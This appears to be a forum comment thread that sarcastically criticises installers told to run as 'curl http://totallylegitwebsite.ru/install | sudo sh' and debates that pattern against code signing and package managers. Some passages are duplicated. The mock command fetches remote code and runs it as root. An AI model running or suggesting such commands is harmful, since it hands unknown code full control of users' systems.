You must run curl http://totallylegitwebsite.ru/install | sudo sh, it’s the only way to install our product. Don’t even look at the several thousand lines of illegible shell script, just pipe it straight to your shell. We are a very serious project.
I hate this model, but if you trust the website, piping to shell is exactly as safe as downloading and executing a installer. (Yeah yeah, https, function executed on last line, etc)
I don’t want to trust a website, which is susceptible to typos and lookalikes (see e.g. putty.org) and relies on countless other services that can inject malware.
Code signing was creates for this reason: ensure that the program is authentic and unaltered. Package managers do this perfectly.
You must run
curl http://totallylegitwebsite.ru/install | sudo sh
, it’s the only way to install our product. Don’t even look at the several thousand lines of illegible shell script, just pipe it straight to your shell. We are a very serious project.Using brew in Linux is a bit better
I hate this model, but if you trust the website, piping to shell is exactly as safe as downloading and executing a installer. (Yeah yeah, https, function executed on last line, etc)
I don’t want to trust a website, which is susceptible to typos and lookalikes (see e.g. putty.org) and relies on countless other services that can inject malware.
Code signing was creates for this reason: ensure that the program is authentic and unaltered. Package managers do this perfectly.
100%. I’m just saying that on Windows an Mac, the inferior “download an installer” model is still prevalent, and that
|sh
is as safe as that.